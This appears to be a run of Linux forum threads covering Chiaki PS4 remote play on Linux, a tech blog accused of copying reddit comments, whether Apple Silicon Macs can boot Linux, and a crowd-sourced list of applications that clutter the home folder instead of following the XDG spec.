Congrats OP, you are more mature than 90% of the internet
I respect you coming out and doing this.  Not everyone can admit when they messed up.
Lol this community is so cringey
[I RES tagged you.](https://i.imgur.com/JbnzY0F.png)

E: If you are reading this, you have probably gone to my profile and sorted by controversial. Hi. For context, OP is apologizing, and I RES tagged him as "Decent Human Being". That is a bit of a strong reaction, but I posted this comment after seeing a lot of negativity towards OP in the comments that I wanted to balance out. I expected this to be controversial.

If you read some of my other most controversial comments, you'll find the cringe and bad taste you're looking for, don't worry. I've posted stuff that I'm not proud of, but I'm not deleting it. It represented my day-to-day mindset then, and who I was.
But still, we all have to admit that Solus is underdeveloped and overrated. It may be someone's pet project but not ready for an everyday use just yet.
Something we can all learn from this -- sometimes when people seem hostile with no visible reasons, they may just be having a bad day, and maybe don't poke the dragon with a stick to confirm if it's pissed off.
I think I play Heroes of the Storm with you last night. 
Takes a man to admit when he's wrong.  No surprise that this man uses Linux.

Well done.
[deleted]
This is big news. If you're like me and like to stream from your PS4 to your PC, now you can in linux. I saw [an announcement post](https://www.psxhax.com/threads/chiaki-free-and-open-source-ps4-remote-play-client-by-thestr4ng3r.7002/) and followed that to [the github](https://github.com/thestr4ng3r/chiaki). I got the AppImage from there (version 1.0.3) and ran it.

I do not have a jailbroken PS4. I had to do nothing but enter my PSN ID in it and go into remote play on the PS4 and get a numeric code to enter in it. [Here is a screenshot of it streaming to my Solus Plasma desktop](https://imgur.com/a/bP2LNSQ)
It's such a greatly underreported story that gaming on Linux went from 0 to 60 in the span of about 12 months. This is another example of that.
Wow, I didn't even know that was a thing. So, you're saying that you can play PS4 games from your PC?
Thank you so much for this. I just played Tekken 7 perfectly in Manjaro. I can now get 20 minutes of Spider-man tomorrow morning from my garage when I am supposed to be trimming the hedges.
it asks for some 8-digit PIN on console registration, i have no ideea what PIN is that...
I'm surprised that this compiled cleanly on a ppc64 host - 

https://pastebin.stratumzero.date/uploads/public/680f6935dcaa956d6de043f40bf46f3634b1eda8/Screenshot_2019-09-27_15-46-57.png

I can't figure out how to press the buttons it wants me to press, though.
How's the latency?

I mean, I guess in general if you're playing a game where it matters you're not going to stream regardless of platform, but most of the games I play are the type where an extra 26ms is an impactful disadvantage (fighting games, mostly).
Wait... Does Xbox have this for Linux too? This seems awesome.
I wonder if you could use OBS with it? Get better options for twitch streaming your ps4 games.
Somebody recently gifted me an Xbox one... But now I wish it was a ps4.. Damn.... Good news... (PS: I steam stream from my native Linux+proton to my shield.. But these options are great)
Now if only there was a way to do this on any Android device except Xperia devices...
I'm just waiting for PC steaming to console to come to Linux (specifically moonlight, so I can stream to my vita) it was the only reason I had a windows partition but I got rid of it because I was fed up, here's hoping it comes soon
OMG!!! I have been waiting for this for so long, thank you for the info, now I won't have to rely on Windows to play my games anymore, This is awesome.
Is there a way to do this over the internet or is this local network only?
This is great, but I seriously wonder how long until Sony issues a cease-and-desist or updates the PS4 to break this.
Which KDE theme is that?
I have a ps4 but I pretty much never use it.   


few questions   


1) can I use any controller with it? IE: does it just take xinput aka could I theoretically get my steam controller to work with it?   
2) whats needed for this? you said your PSN ID, i probably have one. Do I have to be paying for the psn+ or whatever to access it?
How do we use this..? I don't see any documentation or instructions anywhere. I can never understand why some people put so much effort into code without explaining anywhere how to use it.
Does the Dual Shock 4 work on linux in any capacity?
Oh nice, i think i can finally buy a console :)
What’s the latency like? Could I play street fighter V over remote play?
Nice.
Not to sound dumb, but what's the benefit of doing this instead of directly playing your ps4? I'm not sure I fully understand.
Please tell me why "Enter" doesn't open an app or file, but instead lets you rename it?
Doesn't work for me. Sound comes through perfect. Video is frozen on the initial screen when it was started. PS4 and PC are both wired through a gigabit switch. Very cool though. I can't wait until this works
I wonder will they port PSNOW? I would like to play playstation games on the go
I have question , when ps4 data stream can play with mouse and keyboard ? Or not ?
That's awesome! I was never interested in remote play before but now I just have to try it out. Let me find my copy of RELOAD...
Guys, I'm having a tough time getting this to work. I'm not as knowledgeable about this is as I should be by now. I just need help making sure I've got all my dependencies in order and honestly  I have no idea how to run chiaki. most git hubs source code is a little bit easier for me to run..
It doesn’t work
Q
Updated Git link: https://git.sr.ht/\~thestr4ng3r/chiaki
Pretty cool.
The PS4 is a joke of a console but Remote Play is handy until emulators exist.
Just quote top comments on reddit and you are done


http://www.infoworld.com/article/3058240/linux/has-ubuntu-become-a-boring-distribution.html
Lol, they only copy pasted the reddit comments... 
I had a different take on this article. This is a great piece to introduce another audience on just how routine and safe Ubuntu is. A manager would look at this piece and salivate at all these people doing work and not worrying about virus, broken stuff, etc.  Sure, old news to us but it's a big world and some people don't even know reddit exists let alone the Linux subreddit.

tldr: no problema
They used a comment of mine one of these days. I tried to contact them by email to ask them to remove it, but they didn't respond, and their editor mail address even bounces back. They clearly are not a serious journalistic outlet.

edit: I know that by simply posting I give reddit a transferable license to all my comments, but nevertheless, the minimum expected is for them to make that clear, to me, and better yet, to the readers.
Let me summarize every Linux vs windows article i have ever read.
Go with Ubuntu and complain that it looks somewhat bad.
Then claim it's usable.
Bitch and moan about incompatible software.
Make fun of wine.
Say muh documents and claim someone professional in your home doesn't like it.
Claim it's better than windows.
Say it's great but somewhere something is lacking.
Say Linux is great but you switched to windows for the reason that your article will not be torn apart by both fan-boy sides.

"Thought Leader".
Good morning all,

I'm the guy who writes the Eye On Open blog. I noticed this thread and just wanted to share my two cents about yesterday's post about Ubuntu. 

I am a huge fan of this subreddit, it's one of the best places on Reddit. So I will often feature interesting discussions found here on Eye On Open. The blog provides news/discussion roundups about Linux and Open Source. It's my job to find interesting tidbits and present them to readers on the blog. 

Some folks seem a bit confused about the format of the blog. It's important to note that it is a roundup blog that links to interesting news stories and discussions. It is not a blog for original commentary. 

I used to add original commentary to the Eye On Open posts way back when we first started the blog, but we found that the commentary just tended to make the posts too long (I was a political science major in college, so I can drone on for 2000 words on pretty much any topic...heh) and detracted from readers being able to just get right to the news. 

So we moved to the current format which has me writing a brief introduction, and then providing a snippet of the news story or discussion thread. Most readers really seem to enjoy the roundups in their current format, and particularly like illuminating discussions with interesting and informative comments like those often found here in the Linux subreddit. 

If I picked your comment to include in a post, it's because I thought it was worth presenting to my readers. However, I fully understand that some folks might not want their comments included. So if that is the case, just send me an email at jimlynch@gmail.com, along with the URL of the Eye On Open post and the comment you want removed (be sure to include your Reddit user name) and I will remove the comment from the post. 

My thanks to all of you for the constant flow of excellent and informative comments and links. You guys do a great job in making this subreddit a place worth reading. :) 

Today's article: "Tech news writers have easy job, according to reddit"
> YourBrainOnJazz reports on his move to Ubuntu


Seriously?
This what happens when writers get replaced by "content creators".
We just need to use some really fucked up usernames to stop this. Something like BabySkullFuckingHitler 
Not limited to just tech. There's a "writer" over at  knowable.com called Sara Peters, who just copies shit from /r/askreddit or other places on reddit.

It's getting ridiculous. 

How to news:

* Repost things from reddit and twitter.
* Add a clickbait title
I mean, he probably doesn't make very much money either though
Step One: Throw all your journalistic integrity out the window.

Step Two: Make sure to understand which products corporations want to sell in high volume.

Step Three: Steal as much content as you can.

Step Four: re-write the stolen content with on minimal criticisms.
The real issue is the implicit assumption that Reddit posters are representative of anyone other than themselves.

Otherwise, we should not expect legitimate journalism from sites that are free and rely on revenue generated by ads sourced and served via third-party syndication.  The *owners*, not the editors and not the writers, demand this kind of thing.  From they're POV, it's not about journalism, it's about "content" and profit.

Oh you're being sarcastic i actually do want an easy job.
>Captain-Davy: "Linus once said something like "You don't use the Operating System, you use the software… When the user notices the OS exists, that's when something went wrong""

In Russia, the Operating System uses you.
> "tech" "news" "writer"

FTFY
The top 10 reasons to become a tech journalist. You won't believe number 7!
/r/linux does the same by using bots who are picking up stories on different news sites, remove all traces of the original author of the news and post it as their own creation. And the mods are aware of this. So I wouldn't be too fast at pointing the finger.
meh, at least they cited us.  could've been worse.
Well fuck now my throwaway account is published. 
Gizmodo here..when can you start?
[deleted]
I recommend the book Trust Me I'm Lying by Ryan Holiday. He used to work as a media manipulator, planting fake viral stories and things like that, and wrote it as a confession. There's a lot of info about how poor standards are in the world of commercial blogs and news websites, and how easily shitty stories arise and spread either because someone planted them or just because the whole system is broken.
what kind of stupid question is that anyway?  

If the OS is "boring" to use and is stable, then its probably in a good place. 
Well, to be fair, it's Infoworld. Not exactly the best-of-the-best...
* Invocation of Betteridge's Law of Headlines: check
* Bulk of article is just things that other people wrote or said: check
* InfoWorld: check

Yep, this is a tech news article.
YOU GUYS ARE STEALING AD REVENUE FROM THE JOURNALISTS /s

and they wonder why people aren't willing to see annoying ads on their sites
Next for big boy writing class you have to use your own words.
Oh! I have a good example of this! I was doing some Google research one time. First link was a Reddit link, so I read it. Next link was a tech news website. Guess what? Almost word for word what the comments were in the Reddit thread. 

Brb I'll look for it

[**found it**](https://www.reddit.com/r/pcmasterrace/comments/3y6o5a/z/d1p4q5l) That's the direct link to my comment telling OP about it. Read the Reddit comments first, then go to the link I gave OP
Did he change it? Currently it links to reddit posts and gives usernames.
I'll take boring as long as it's pretty current and solid. Just not cutting edge tech the world has never seen trying to forcefully retrofit it's way into my workflow.

If I need you, I'll call?
Excellent point. Theoretically, you own the copywrite to your post. They did proper attributions but it appears they didn't get permissions to repost your work. The mea culpa is on them.

Is it worth fighting over?
You could have put "news" in quotation marks too
                                                                                                                                                                                                                                                                                                                                                                                                                                                     
unfortunately in an industry where the people judging your performance aren't qualified being qualified isn't an advantage, because they can't tell the difference.
Looks like Jim Lynch is a "Thought Leader" after copying, pasting, and profiting off of reddit comments.  Hah.
unlike most other news reporters that actually write their articles  
(/s, if it wasn't obvious)
Yeah it's super lazy.  But at least they linked to the thread.

As long as they're being totally up front about it, I don't think it's a huge problem, and it might even bring a few more users to the thread with something interesting to say.

I agree, it's not really "reporting", but technically it is just "reporting" something that happened.  And considering the event is text, the source text is more useful than a re-wording.  Of course a proper "reporter" would add some more text, but would that really add that much value to the article in this case?

This reminds me a lot of the debate about whether Julian Assange is a "journalist" or not.  Which mostly seemed to be centered around the same premise.

I think the difference is mainly relevant to what somebody "claims to be" rather than technically where you can definitively say they are or aren't.

Fair enough to give them shit about it though.  Especially as OP is specifically, using the term "writer".
That is a major shit post. It is almost like  reading Reddit on another site except non-interactive and shitty.
I get the article is crap, but isn't painting all tech journalists as lazy-butts with that title kind fo unfair? There are some legitimately great tech writers out there who work their butts off for content that people might enjoy. Just definitely not this guy.
What's the problem of somebody reporting about an interesting and/or funny reddit post?
If you don't like it, you don't have to read it. Unnecessary repetition will cancle itself out through supply and demand balance.
Journalism is dead.

Tech journalism has been rotting in the corner for a while.
I'll try it.
i think that's called buzzfeed of tech news.
That's a little... odd. I probably would have put more original content in there myself. 
I remember going through the thread mentioned in this article and now its basically regurgitated.
Sensationalist headlining! >.<
[somewhat relevant](https://thepiratebay.se/torrent/4310526/Steal_This_Film_1_2_ENG_%282006-07%29.avi)
Devil's advocate: at least they are writing of free and open source software.
That's a new low even for "gonzo" journalism.

=/
Serious question:  When deriding such articles, wouldn't it be most helpful to link to a screenshot rather than the original?  Otherwise the resulting traffic will serve to reinforce the value of such content freebooting.
I like Linux but it still has quirks.  I have dozens of recent quirks to show that.   What is s quirk.   Can't get on a wpa2 wifi at work.    Didn't work period.   We have 2 so I had to use the guest wifi.
This is modern journalism in general, not just regarding tech. 
Maybe we shouldn't link directly to the article and give them page hits, then?
In an interview with John Gruber of Daring Fireball, we get confirmation that new Macs with ARM-based Apple Silicon coming later this year, will not be able to boot into an ARM Linux distro.

There is no Boot Camp version for these Macs and the bootloader will presumably be locked down. The only way to run Linux on them is to run them via virtualization from the macOS host. Federighi says "the need to direct boot shouldn't be the concern".

Video Link: https://youtu.be/Hg9F1Qjv3iU?t=3772
This didn’t surprise me, considering the previous design changes, beginning with the implementation of T(x) controllers. With a proprietary CPU architecture, then it would require a compiled kernel for that OS to boot up and run on the hardware. Plus, Apple is moving to a new integrity check validation of storage volumes. Probably locked down to a specific machine that requires the Apple Silicon. So emulation may not even be feasible to accomplish.
Careful with the confirmation BIOS guys.

What Apple means with "support" is that they have a support process for this. They never "supported" booting Linux, but it was possible. They only supported booting Windows with Bootcamp. They don't support Bootcamp on ARM Macs really because providing Bootcamp for "Windows for ARM" is not something anyone cares for, needlessly confusing for casual buyers, and no graphics drivers for Apple Silicon exist anyway.

This video flat out tells you that Apple Silicon Macs will still boot operating systems not signed by Apple (although they of course explain this in terms of the use case of legacy macOS versions): [https://developer.apple.com/videos/play/wwdc2020/10686/](https://developer.apple.com/videos/play/wwdc2020/10686/) (18:45).

Never buy a Mac for Linux, but that isn't because of the locked bootloader.
Can you even install Linux on current Macs? If I remember correctly, you could only boot into Linux, not install it due to the T2 chip
Someone's gunna do it anyway, watch
Yep ARM taking over x86 also means locked bootloader and probably no upgrading components due to everything being soldered.

Thanks but no thanks, I like having freedom of choice in my PC hardware and software
And then, the opposite statement:

[https://www.reddit.com/r/apple/comments/hfjaeg/arm\_macs\_will\_feature\_a\_reduced\_security\_mode/](https://www.reddit.com/r/apple/comments/hfjaeg/arm_macs_will_feature_a_reduced_security_mode/)
Guess I'll have to keep never buying Apple products
Next up: jail breaking a mac
People are missing the point. This doesn't directly affect linux users but Apple is a trendsetter. They got rid of removable batteries both from phones and laptops setting up the trend, they removed headphone jacks, optical disks. Others followed suit. If industry follows Apple on this one, it'll harm computing industry as a whole.
I fail to see how this will actually affect their sales.

How many people buy macs to change the OS on them? It's such a minority. Mac hardware support on linux has been always shaky anyway. Mac userbase vs people who are opposed to (and knows what is) locked bootloaders have a very limited userbase.

Whatmore; it's almost as easy to program on osx as it is on linux. So the programmer base will not really be affected that much.

I am always sad that vendors announce incompatibilities. But this hardly affects our community as I see it. The ones who are hurt the most would be die-hard linux users that are forced into mac products by their work situations. But even then; if you can't control your hardware; IT department probably wants to control your stuff anyway so you should not be installing a custom OS on there anyway.

It's much cheaper to assemble/buy a similar spec mac anyways. The only bonus I see on getting a mac as opposed to other laptop/pc vendors is the design; which has been going downhill since 2014 for me anyway.
In my opinion, of the two things will happen.

1. ARM Macs will perform really well and people will buy them in huge numbers. That will drive another nail in the coffin of desktop Linux. Those who genuinely need another OS will look into a Remote Desktop solution — might create a niche product. A company like Parallels might come up with a polished solution of some sort. 
1. ARM Macs will be unpopular and Apple will have to come up with some sort of solution — like they did with butterfly keyboards. I don’t think a switch back to Intel is a realistic option. That would be a fiasco of Apple Maps proportions — except far more expensive, and will almost certainly spell the end of macOS as a viable platform.

Given that they are launching more Intel Macs, and with their support track record, I don’t think we need to worry for another 4-5 years — at will point, the future of macOS will be much clearer. 

One major potential problem in case these machines are popular is Microsoft and OEMs following suit — they way they follow iPhones.

**Update:** When I said #1 would mean another nail in the coffin of desktop Linux, I was trying to convey that a lot of people use Linux as their secondary OS on a multi boot system - and if this trend of not allowing dual booting catches on - especially in the PC world - that will take away a lot of hobbyist Linux users. The hard core users will always find a way, of course, but there are not that many of them around.
Apple being Apple..
It’s the end of the hackintosh scene is what it is. Back to the 90s!

Thing is, back then Apple was the only game in town for a decent desktop os that you could *actually use* for creative work. That isn’t even close to true any more. Don’t think I’ll be buying into their ecosystem any longer ...

shit ... except I’ve got keep working on mobile apps ... which means if I want to compile for iOS I MUST have an obscenely expensive locked down af Mac. Hell, even if I just do PWA (which is where I’m headed anyhow) ... I STILL need a damn legit Mac, to run the special version of safari *just* to view the damn browser console from the iOS device. 

I’ve been a die hard Apple fan since I was a kid. But Seriously. Fuck Apple. How are they not the target of antitrust legislation over this bullshit (and the App Store thievery as well)? 

Apple became Microsoft. And Microsoft is becoming the new Apple. 
2020 can’t get any weirder
The wall goes higher.
Honestly,  I'd be curious to see people complain that they can't bootcamp windows on these...
Is it even going to be possible to run MacOS in a VM on an x86 PC if MacOS is compiled for ARM going forward into the future? Because I'm imagining for example developers who use MacOS VMs to test their websites in safari or their apps on MacOS, to avoid having to buy a MacOS laptop.. if they can't do that anymore, that's going to be an issue.
Probably shouldn't buy a Mac to install Linux anyways.
You think you should be able to do whatever the hell you want with something you've paid for and you own.
...not yet or officially anyway. :)
Linux people be like: Challenge accepted
A computer that can't run Linux? I definitely don't need it.
Anyone has the choice of his hardware, so there are many alternatives to move around this walled garden.
Apple turns mac in iPad with keyboard and focuses on consumers.

Look on the bright side though. The music/design/video pros have been disappointed with Mac for some time now. Hackintosh use was on the rise. Better keyboard and mac Pro alleviated some of that but there is transition causing worries. I think transition to arm will not go as smooth for professionals and will cause dissatisfaction. Those disappointed won't all go to Windows, some will go to Linux.
Caption obvious confirms. Apple wants to further lock in its userbase.
The pragmatist in me says "Oh well, I can't afford and don't want one of these new Macs anyway".

But the realist in me knows that Microshaft will use this as an excuse to introduce this on the PC, if/when that transitions to ARM. The favorite excuse that big business loves to use today is "don't blame us, blame our competitors, because they started this trend".

This is an all-purpose get-out-of-jail free card for corporate America, whether they're stealing your browsing history or delivering untested updates to your computer that delete your files.
Good thing I already didn't want to buy Mac
So will the first Arch on Silicon Mac happen in days or hours? Taking bets…
And this is why I don't use Apple products.
It’s like they didn’t learn from the PowerPC days at all...
And that was the final nail. Just sold my 16" MBP - getting off this lame duck train before it crashes.
It would have been nice to see their ultra light line (macbook, macbook air) run ARM chips, and their pro series use ryzen. I think in most people's minds, ARM is for low power mobile devices.

I guess I don't see all the fuss about being locked into an OS. It's not like there aren't linux system builders (system 76) who work hard to bring their own OS to the table (Pop! os).
Does it really matter to anybody? I mean, you can buy quality hardware for less money anyway.
I’ve never understood why people who pay quite a lot of money for a laptop then put windows on it. I agree if you own it you should put whatever os you want and it shouldn’t be locked down, but I have no issues with virtualisation been a long vm user
Linux users should buy hardware that caters to Linux.
Who cares?  Don't buy a MAC...
Well, at least that's the end of the embarrassment of seeing Linux devs working on Macbooks. That never felt right to me.
Remember, this is the company 'bettering humanity through technology' !!

/s
Therefore, nobody should purchase those appliances. They are not computers if they cannot run arbitrary software.
That will be true until it isn't.
Probably not the right sub, but what about hackintoshing?
An obstacle to hack? Hold my beer
Ah :( . I heard it would support booting other operating systems somewhere else and was hoping there would finally be fast ARM hardware available, but of course they have to lock it down like so many other ARM things, and like iOS; of course the new version of Mac OS is more locked down; of course they use this transition as an opportunity to get an iron grip on their computers. I do wonder if laptop manufacturers will be as bad as phone manufacturers in blindly copying Apple's anti-features, in this case. 

Edit: Actually, it turns out that it [does support it after all](https://reddit.com/comments/hfkdlg/comment/fvy6yry?context=3)! That is a relief.
Thats the whole point.
If I wanted to run Linux I wouldn't do it on $1600+ specialty hardware
The cult of Apple is amazing. Sacrifizing features every year for a thinner physical device is astounding. Literally regressive.
The need to direct boot won't be a concern because these won't be machines for professional developers or power users anymore. They will be just shiny toys for the rich, idiot masses.
i guess no more buying macs and sticking linux on them for work. finally a reason to move to dells
I'm definitely not going to buy this product.
I expect this simplifies the process of IOS and MacOS converging into a single OS.
[deleted]
Called it!
If your corporation forces apple products on its employees to support this surveillance then you are part of the problem.
But it is a concern, at least for 5 years in the future when Apple stops providing upgrades for a specific hardware version and I want to install Linux instead. 

I have Ubuntu Linux running on several 6+ year old iMacs.  
If nothing else, they make excellent terminals for browsing, getting email, etc. We keep them scattered about the office for convenience.
I liked Apple years ago, even though they always sucked their products were cute with their esthetics. Goddamn now a days they’re really evil.
Color me surprised... not.
And this was the moment that I have now decided to stop purchasing anything APPLE related and will more fully embrace OSS.
Here comes another lawsuit.
That's what happen when you feed money to an evil company.
This shouldn't be a surprise, and FLOSS peeps shouldn't be bent out of shape about it. Look at the amazing rise of ARM (and, hopefully, eventually, RISC-V) for the FLOSS crowd...Pine64 devices, Purism devices, and many more...MS and Apple no longer hold a complete monopoly...and with MS's recent "love" of GNU/Linux, it's just another indicator that things are getting better, not worse!
Honestly I fail to see who the fuck is actually gonna buy one of these.

I hope it actually has an adverse affect and turns more people towards Linux. 20.04 has come so so so far since 18.04 that I’m actually daily driving it now.
lol, I am absolutely shocked.
I really do hope consumers pressure then to change this.

Decisions like this do not bode well for desktop computing.
G'bye Apple!
If the boot loader is locked, I think that could potentially be used as evidence of an antitrust, combined with Microsoft mandating the lockdown of ARM PCs for Windows 10. You could bring that up with the EU as an anti-consumer practice and even an environmental hazard if the device becomes effectively useless once macOS stops supporting it.
So are they trying to slowly close off MacOS too?
Yeah this isn't surprising at all.
The bootloader is actually going to be open. You will be able to boot multiple OS installs (but for the moment only macOS is sure to run), since every OS will have an encrypted bootloader, with its security data.
In the long run, you will either have a thin client or a Thalos workstation.

Personal Computing  will be dead in 10 years, you either have the money to subscribe to a cloud based computing solution or use a mobile phone for your computing needs!

Dont have the pressure to innovate, if you only offer a subscription based licensing model!
And in classic Apple fashion....
So basically the same situation as ARM Chromebooks
Downvoting based on other comments starring this whole bit is bullshit. 

> Apple Silicon coming later this year, will not be able to boot into an ARM Linux distro.

>There is no Boot Camp version for these Macs and the bootloader will presumably be locked down. The only way to run Linux on them is to run them via virtualization from the macOS host.
This means that when Apple no lo glee support the hardware automatically became useless garbage
who would have seen this coming????????????????????????????????????????????????????????????????????????????????????????????????
I'm not sure if this is something that bothers anyone else, or if anyone here is interested in helping with this project, but I'm tired of dot/hidden folders filling my home folder.

I've been making a list of programs that create these folders, and I'm trying to make bug reports / feature requests to the projects. If anyone here is interested, maybe we could work together and make this list bigger, and a few of us can create the reports. I've found that the developers of these projects are very receptive each time I've suggested this, and a few have been fixed in a very short time. It seems like a fairly simple request and fix.

Most newer programs and major projects use this spec -- so most of the programs that need changing are older or have few developers (or in many cases only one).

The bug reports are just asking that the developers use the [freedesktop $XDG standard/spec found here](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html).

Config files in \~/.config

Data in \~/.local/share

Temp/Non-Essential files in \~/.cache.

Maybe some developers here on reddit would be able to submit patches or change their own programs to follow this spec.

If anyone here creates a report, please let me know and I'll update the list.

Anyway, here is the list I've started.

**Edit: Wow, this blew up. I didn't realize there were so many programs, or that this annoyed more people or created an inconvenience for more than just myself.**

**If you read this please consider reporting/requesting/helping just one program you use. If we all did this they'd all have reports by now, and maybe even fixes already! Thanks everyone for the help and info!**

\---------------------------------------------------------------

Apps that don't follow the freedesktop $XDG spec

Unless otherwise noted, the name of the program is also the name of the created .folder

|\-- REPORTED --||
|:-|:-|
|atom|[https://github.com/atom/atom/issues/8281](https://github.com/atom/atom/issues/8281)|
|cargo|[https://github.com/rust-lang/rfcs/pull/1615](https://github.com/rust-lang/rfcs/pull/1615) [https://github.com/rust-lang/cargo/issues/1734](https://github.com/rust-lang/cargo/issues/1734)|
|chatty|[https://github.com/chatty/chatty/issues/273](https://github.com/chatty/chatty/issues/273)|
|Cryptomator|[https://github.com/cryptomator/cryptomator/issues/710](https://github.com/cryptomator/cryptomator/issues/710)|
|dbus|\[WONTFIX\] [https://bugs.freedesktop.org/show\_bug.cgi?id=40387](https://bugs.freedesktop.org/show_bug.cgi?id=40387)|
|firefox (creates .mozilla)|[https://bugzilla.mozilla.org/show\_bug.cgi?id=259356](https://bugzilla.mozilla.org/show_bug.cgi?id=259356)|
|Flatpak (creates .var)|\[WONTFIX\] [https://github.com/flatpak/flatpak.github.io/issues/191](https://github.com/flatpak/flatpak.github.io/issues/191)|
|goldendict|[https://github.com/goldendict/goldendict/issues/151](https://github.com/goldendict/goldendict/issues/151)|
|gramps|[https://gramps-project.org/bugs/view.php?id=8025](https://gramps-project.org/bugs/view.php?id=8025)|
|grsync|[https://sourceforge.net/p/grsync/feature-requests/15/](https://sourceforge.net/p/grsync/feature-requests/15/)|
|hplip|[https://bugs.launchpad.net/hplip/+bug/307152](https://bugs.launchpad.net/hplip/+bug/307152)|
|menulibre|[https://bugs.launchpad.net/menulibre/+bug/1786655](https://bugs.launchpad.net/menulibre/+bug/1786655)|
|npm|\[WONTFIX\] [https://github.com/npm/npm/issues/6675](https://github.com/npm/npm/issues/6675)|
|ssh|\[WONTFIX\] [https://bugzilla.mindrot.org/show\_bug.cgi?id=2050](https://bugzilla.mindrot.org/show_bug.cgi?id=2050)|
|snapd (creates snap)|[https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1575053](https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1575053)|
|stellarium|[https://github.com/Stellarium/stellarium/issues/76](https://github.com/Stellarium/stellarium/issues/76)|
|thunderbird|[https://bugzilla.mozilla.org/show\_bug.cgi?id=735285](https://bugzilla.mozilla.org/show_bug.cgi?id=735285)|
|travis|[https://github.com/travis-ci/travis.rb/issues/219](https://github.com/travis-ci/travis.rb/issues/219)|
|vscode|[https://github.com/Microsoft/vscode/issues/3884](https://github.com/Microsoft/vscode/issues/3884)|

\--------------------------

|\-- FIXED --||
|:-|:-|
|hardinfo|[https://github.com/lpereira/hardinfo/commit/06b0d18501c7e25c8d22fa53a9cd5f381334fc44](https://github.com/lpereira/hardinfo/commit/06b0d18501c7e25c8d22fa53a9cd5f381334fc44)|
|rnm|[https://github.com/neurobin/rnm/commit/a8ce3f45feac698a754c453fd57cf49e2891c602](https://github.com/neurobin/rnm/commit/a8ce3f45feac698a754c453fd57cf49e2891c602)|
|gimp|reportedly changed in 2.10|
|lutris|reportedly changed in latest version|

\--------------------------

|\-- UNREPORTED / UNFIXED --|
|:-|
|\* If you use a program here please do consider taking a minute or two to add a feature request / bug report  \*|
|acetoneiso|
|amule|
|ansible|
|anthy|
|Arduino|
|audacity (creates .audacity-data)|
|bash (creates .bashrc & .bash\_history files)|
|BitwigStudio|
|bluefish|
|calcurse|
|ccache|
|cinnamon|
|citra|
|clamtk|
|claws-mail|
|cmake|
|cura|
|dia|
|docker|
|dreamchess|
|eclipse|
|emacs (creates .emacs.d)|
|ethereum|
|flowblade|
|freac|
|gdmap|
|git (creates .gitconfig file)|
|gitbook|
|gmvault|
|gnome-color-chooser|
|gnome-keyring (creates .pki)|
|gnupg|
|gradle|
|howl|
|httpie|
|hydrogen|
|irssi|
|jupyter|
|kivy|
|libdvdcss used by VLC/Mplayer (creates .dvdcss)|
|mame|
|mednafen|
|mixxx|
|mono|
|mpd|
|mpdscribble|
|mutt|
|nano|
|netbeans|
|ncmpcpp|
|Nvidia (creates .nv)|
|OpenJDK (creates .java)|
|Pale Moon (creates .moonchild productions)|
|parallel|
|Pidgin (creates .purple)|
|PlayOnLinux|
|praat (creates .praat-dir)|
|psensor|
|putty|
|PyCharm (creates .folder for each release)|
|pypar2|
|pyrenamer|
|remmina|
|rustup|
|scilab|
|SiriKali|
|Skype (creates .skypeforlinux)|
|slic3r|
|snes9x|
|steam|
|subversion|
|synaptic|
|teamspeak (creates .ts3client)|
|tox|
|tumbler (creates .thumbnails)|
|tunapie|
|tuxguitar (creates .tuxguitar-1.2)|
|unison|
|vim / vim-gtk / vim-gtk3 (creates .vim)|
|w3m|
|wicd|
|wine|
|winff|
|x2go|
|xsane (creates .sane)|
|yadm|

\--------------------------

Unconfirmed. If anyone could confirm these I will move them to the  proper list. Thanks to /u/sithiLoe, there is a long [archwiki list here](https://wiki.archlinux.org/index.php/XDG_Base_Directory_support) of possibly still-offending apps. If anyone can confirm these and/or send a bug report to the devs it would be appreciated.

|\-- UNCONFIRMED --|
|:-|
|adb (may create .android)|
|kodi|
|mplayer|
|PeaZip|
|tupi|
|wget (may create multiple .files/folders)|

\--------------------------
> If anyone here is interested, maybe we could work together and make this list bigger

There already is one in [archwiki](https://wiki.archlinux.org/index.php/XDG_Base_Directory_support).
The issue on the mozilla bugtracker regarding Firefox was opened 14 years ago, the one regarding Thunderbird was opened 7 years ago. That's kinda sad... :(

To add to your list:

- GNU parallel creates `$HOME/.parallel`
- Smartgit creates `$HOME/.smartgit`
- Deepgit creates `$HOME/.deepgit`
- Travis CI client creates `$HOME/.travis` ([reported](https://github.com/travis-ci/travis.rb/issues/219) by someone back in 2014 with no reponse yet)
- NPM stores cached packages in `$HOME/.npm` ([issue got rejected](https://github.com/npm/npm/issues/6675) - lol)
- The entire Jetbrains suite pollutes the home directory with each major version of their software releases, eg. `$HOME/.PyCharmCE2018.1` or `$HOME/.WebStorm2018.1`
- Chatty creates `$HOME/.chatty` (I've [opened an issue](https://github.com/chatty/chatty/issues/273) for that)
- Teamspeak3 does create `$HOME/.ts3client`, but I also have a `$HOME/.TeamSpeak 3` folder for some reason. So yeah, I can confirm this...
- Nvidia stores shader caches in `$HOME/.nv`
[deleted]
[deleted]
Not a dotfile; is worse, but has anyone who played Emily is Away shaken their head at the game creating a KyleSeeley (this is the game dev) folder in the home directory?

MiniTube was almost equally as brazen the last time used it, although I think it was at least a dotfile folder of the dev's name.
You can add calcurse, ncmpcpp, and teamspeak to that list. I'm with you here, home clutter really irritates me and shouldn't be a problem we still have to deal with.
ironically this issue ends up also affecting Windows users as well because it seems cross-platform has become synonymous to disrespecting all platform standards equally.

So I have my  "home" folder filled with .folders like this (which in windows are not hidden btw):

	Mode                LastWriteTime         Length Name
	----                -------------         ------ ----
	d-----       20/02/2017     18:15                .android
	d-----       07/07/2018     03:05                .kivy
	d-----       21/01/2017     16:02                .nuget
	d-----       12/08/2018     21:19                .pylint.d
	d-----       11/08/2018     22:55                .VirtualBox
	d-----       21/01/2017     16:14                .vs
	d-----       16/12/2016     00:10                .vscode
	d-----       27/07/2018     21:56                OpenVPN
	d-----       28/07/2018     11:40                source
	d-----       22/07/2018     13:00                Sync
	-a----       03/08/2018     21:50             38 .bash_history
	-a----       24/06/2018     14:57              2 .Bookmarks.SQLToolsStorage.json
	-a----       23/06/2018     14:58             98 .gitconfig
	-a----       24/06/2018     17:01            286 .sqltools-setup
	-a----       30/05/2018     19:25           1241 .viminfo

Instead of having them go into %AppData% like their supposed to. One solution I've adopted for the worst offenders (games) is to just run them as a different user, so then they trash a specific home folder instead of mine, but that comes with an entire new set of challenges.

A proper solution would be to virtualize and redirect all file access, because in the end we can't trust developers to not do bad things out of laziness.
[deleted]
